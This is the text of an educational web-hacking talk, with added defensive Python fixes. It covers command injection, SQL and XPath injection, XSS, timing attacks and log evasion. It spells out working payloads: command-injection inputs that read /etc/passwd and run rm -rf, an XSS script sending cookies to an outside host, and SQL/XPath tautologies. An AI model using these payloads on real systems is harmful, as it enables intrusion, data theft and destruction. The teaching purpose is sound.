Crash Course in Hacking


Mike Gerschefske
CRASH COURSE IN WEB HACKING
Hacking is illegal (most of the time)
- Understand the laws
- Port scanning can be considered illegal
- Post 9/11 it can be treated as an act of terrorism
- DMCA exceptions
- Educational learning (institution)
Who cares about web hacking?
- The days of buffer overflows and root boxes are nearing an end…
  - Non-executing stacks
  - People patching their systems
- Everything is turning into a web system
Power of Google
- Google knows all
  - SSNs/credit cards, backend SQL
  - http://johnny.ihackstuff.com/ghdb.php
  - intitle:snc-rz30 inurl:home/
- Robots.txt
  - Don't put secrets in here
Power of the web browser
- Is capable of HTTP GET/POST
- Capable of sending any kind of GET/POST
- Doesn't have to run client-side code (i.e. JavaScript)
- Can send anything it wants to
- Can be bad:
  - URL: http://somesite/index.php?section=Admin
  - Vertical escalation
Bad Code = Bad Security
- You are not able to control the client end:
  - Cookies
    - Do not put the user level (admin, user, etc.) in them
      - Vertical escalation
    - Do not put the user id in them
      - Horizontal escalation
  - POSTs
  - GETs
  - Session IDs
  - All data
Museum Example

Code from two years ago (the vulnerable CGI script as presented; line numbers dropped, comments added):

#!/usr/bin/perl
use CGI qw(param);   # provides param(); the remaining elided lines are not shown
# …
$first = param('first');
$last = param('last');
$password = param('password');

# …
# Note: "!" binds tighter than "eq" in Perl, so "! $password eq 'unbreakable'"
# is always false and the password is never actually checked here.
if (($first eq "") || ($last eq "") || (! $password eq "unbreakable")) {
    print "<p>Could not understand or wrong password!!</p>";
}
else {
    # Unvalidated user input is interpolated straight into a shell command
    system "cat ./museum_ideas/${first}.${last}";
# …
Some Good Combinations
Dump the password file:
First Name: .
Last Name : /../../../../etc/passwd
Password : unbreakable
Delete the whole directory:
First Name: NOTEMPTY
Last Name : & rm -rf /home/museum/public_html/cgi_bin/museum_ideas
Password : unbreakable
Command Injection
- This is the basic idea of command injection
- Security through obscurity sometimes works
- Some people are very diligent
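A hardened version of the museum lookup, written in Python as an added example (not the talk's code): the names are allowlisted, the file is opened directly rather than through a shell, and the resolved path is checked against the ideas directory. The regex, function names and the /srv base used in testing are assumptions.

```python
import os
import re

IDEAS_DIR = "/home/museum/public_html/cgi_bin/museum_ideas"  # directory named in the talk
NAME_RE = re.compile(r"[A-Za-z][A-Za-z-]{0,39}")              # constructed allowlist

def museum_idea_path(first, last, password, base=IDEAS_DIR):
    """Return the file to read, or None if any input is rejected."""
    if password != "unbreakable":
        return None
    # Allowlist, not blocklist: letters and hyphens only, so ".", "/", "&",
    # ";" and whitespace never reach the file system or a shell.
    if not (NAME_RE.fullmatch(first) and NAME_RE.fullmatch(last)):
        return None
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, f"{first}.{last}"))
    # Second line of defence: the resolved path must sit directly under base.
    if os.path.dirname(candidate) != base_real:
        return None
    return candidate

def read_idea(first, last, password):
    path = museum_idea_path(first, last, password)
    if path is None:
        return "<p>Could not understand or wrong password!!</p>"
    with open(path, encoding="utf-8") as fh:   # read the file directly; no shell, no cat
        return fh.read()
```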
SQL Injections
- We can send commands, why not SQL?
- What is SQL?
- What can we do with SQL?
  - Get any data we want (that the user has access to)
  - Delete all the data the user has access to
  - If the user is root, dump the database
  - If the user is root, can upload and execute Java/C from the database and root the box
How to protect against it?
- Check parameters
  - Not really…
- Need to do SQL parameterization whenever at all possible
  - Mark strings as strings, ints as ints
    SELECT * WHERE name = @
Why doesn't checking params work?
- If you're really smart it will, but if you don't understand the problem it won't
- This is a very difficult problem to understand
- Example:
  - http://viva/ictf/index.php/SQL_Injection
  - The problem is that the ' (apostrophe) is a special character
  - To fix it we just find and replace all apostrophes with two '' as that's how we insert apostrophes in a string
  - NO!
Second Level SQL Injection
- The problem actually isn't solved, just more complicated
- Take:
    Username = ' OR 'a' = 'a
    SELECT * FROM Users WHERE UserName = ''' OR ''a'' = ''a'
- Goes in fine but coming out…
  - Get the username from the DB and put it in a var
  - The var contains SQL
  - We TRUST the DB to give us good data
  - Create another SQL query and the second one is now vulnerable
    SELECT content FROM database WHERE username = VUNSQL
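The two-step failure above, worked through with sqlite3 as an added example (not from the talk): the doubled-apostrophe "fix" lets the slide's payload in intact, and the second, concatenated query is the one that breaks; the parameterised variant beside it is the fix. Table names, rows and function names are constructed.

```python
import sqlite3

PAYLOAD = "' OR 'a' = 'a"   # the username from the slide

def setup():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserName TEXT)")
    conn.execute("CREATE TABLE Content (username TEXT, content TEXT)")
    conn.executemany("INSERT INTO Content VALUES (?, ?)",
                     [("alice", "alice's private notes"),   # constructed rows
                      ("bob", "bob's private notes")])
    return conn

def register(conn, username):
    # The "fix" from the previous slide: replace ' with '' and concatenate.
    escaped = username.replace("'", "''")
    cur = conn.execute("INSERT INTO Users (UserName) VALUES ('%s')" % escaped)
    return cur.lastrowid           # the payload is now stored, literally, as data

def content_for_user_vulnerable(conn, user_id):
    # Step 1: read the username back; the DB hands us the raw payload.
    (name,) = conn.execute("SELECT UserName FROM Users WHERE rowid = ?",
                           (user_id,)).fetchone()
    # Step 2: trust it and build the next query by concatenation -> injectable.
    sql = "SELECT content FROM Content WHERE username = '" + name + "'"
    return [row[0] for row in conn.execute(sql)]

def content_for_user_safe(conn, user_id):
    (name,) = conn.execute("SELECT UserName FROM Users WHERE rowid = ?",
                           (user_id,)).fetchone()
    # Parameterisation: the driver passes the value as data, never as SQL text.
    return [row[0] for row in conn.execute(
        "SELECT content FROM Content WHERE username = ?", (name,))]

def demo():
    conn = setup()
    uid = register(conn, PAYLOAD)  # insert succeeds; nothing looks wrong yet
    return content_for_user_vulnerable(conn, uid), content_for_user_safe(conn, uid)
```

The vulnerable path returns every row in Content (the WHERE clause became `'' OR 'a' = 'a'`); the parameterised path returns nothing, because no content belongs to that literal username.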
XSS – Cross Site Scripting
- Malicious injection of JavaScript
- Cookie hijacking
- MySpace – replicate itself, add friends
  - Samy - http://web.archive.org/web/20060208182348/namb.la/popular/tech.html
<script>
document.write("<img src=http://site.com/a.jpg?cookie=" + document.cookie)
</script>
Xpath Injection
- //user[name/text() = '' or 1=1 or '' and password/text() = 'junk']
- Used with:
  - XML RPC
  - SOAP/WSDL
IDS Will Find You
- SQL/command injection is very easy to detect
- IDS is poor at handling packet fragmentation combined with timing attacks
Profiling
- Need to know what you're attacking
- Can search for exploits
- HEAD / HTTP/1.0 example
  - Everyone's a little different
- Nmap is a good profiler
- Nessus will profile too
Tools
- Add N Edit Cookie – Mozilla Firefox extension
- Wget
- TamperData – Firefox
- Modify Headers – Firefox
- Curl
- Netcat/Telnet
- Proxies
  - Paros Proxy – free
  - Fiddler – Microsoft, free
  - Spike – free
Timing Attacks
- Breaking authentication
  - A wrong username and password may take x time, while a username that doesn't exist takes y time
- Successful timing attacks against encryption
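One way to close the "username doesn't exist" timing gap described above, as an added example (not from the talk): the same PBKDF2 work runs whether or not the user exists, and the final comparison is constant-time. The user store, dummy record and iteration count are constructed.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000   # constructed; tune to your hardware

def make_record(password):
    """Salted PBKDF2-HMAC-SHA256 record: (salt, digest)."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest

# Constructed user store; in practice this is a table of salted hashes.
USERS = {"alice": make_record("correct horse")}
# Dummy record used for unknown usernames so the expensive hash still runs
# and "no such user" costs the same as "wrong password".
_DUMMY = make_record("not-a-real-password")

def check_login(username, password):
    salt, expected = USERS.get(username, _DUMMY)
    # Always do the full PBKDF2 computation, even for unknown usernames.
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    # Constant-time comparison; a plain == can leak how many leading bytes match.
    matches = hmac.compare_digest(candidate, expected)
    # Unknown users must still fail even if someone guesses the dummy password.
    return bool(matches and username in USERS)
```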
ASP.NET Exploit
- Debugging (source code) only available to localhost
- Bypass this check by sending the following:
    GET http://localhost/bleh.asp?a=j HTTP/1.0
- It checks the server name variable rather than the remote address
Mod_security
- http://www.modsecurity.org/
Replay Attacks
- Scorebot deletes flag
- Scorebot adds flag
- Since the scorebot goes to everyone, we have the delete and add sequence
- Can potentially replay the same delete sequence across all enemy servers
Log Evasion
- Many logs only log ~4K of the URL
  - Prevents DoS from filling up the logs
- If the payload is past the end of the 4K, the malicious payload won't be logged
    http://somewhre.com/page.asp?foo=....&payload=MYPAYLOAD
  - Application ignores the foo parameter
  - Log shows up as GET /page.asp …
- Not just IIS; Sun One App Server too
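An added example (not from the talk) of checking for this from the defender's side: given a request line and the logger's cut-off, report which query parameters would never reach the log, plus a heuristic for spotting already-truncated lines during log review. The 4096-byte limit follows the slide's ~4K figure; the sample request is constructed.

```python
LOG_LIMIT = 4096   # bytes of request line kept by the logger (the slide's ~4K)

def audit_request(method, path_and_query, log_limit=LOG_LIMIT):
    """Return (truncated, hidden): hidden lists params that end past the logged prefix.

    A parameter is reported if any part of its name=value pair lies beyond
    log_limit, so both the padding parameter and the real payload show up.
    """
    line = f"{method} {path_and_query}".encode()
    truncated = len(line) > log_limit
    hidden = []
    head, sep, query = line.partition(b"?")
    offset = len(head) + len(sep)          # byte position where the query begins
    for pair in (query.split(b"&") if query else []):
        end = offset + len(pair)
        if end > log_limit:                # this pair extends past what gets logged
            hidden.append(pair.split(b"=", 1)[0].decode(errors="replace"))
        offset = end + 1                   # skip the '&'
    return truncated, hidden

def looks_truncated(logged_request_line, log_limit=LOG_LIMIT):
    """Log-review heuristic: a line sitting exactly at the limit was almost certainly cut."""
    return len(logged_request_line.encode()) >= log_limit

# Constructed request in the shape the slide describes: a long ignored "foo"
# followed by the parameter the application actually acts on.
SAMPLE = "/page.asp?foo=" + "A" * 5000 + "&payload=MYPAYLOAD"
```

Logging the full parameter list at the application layer (names at minimum, lengths and a hash of each value if storage is a concern) is the practical fix, since the web server's own access log cannot be relied on past the cut-off.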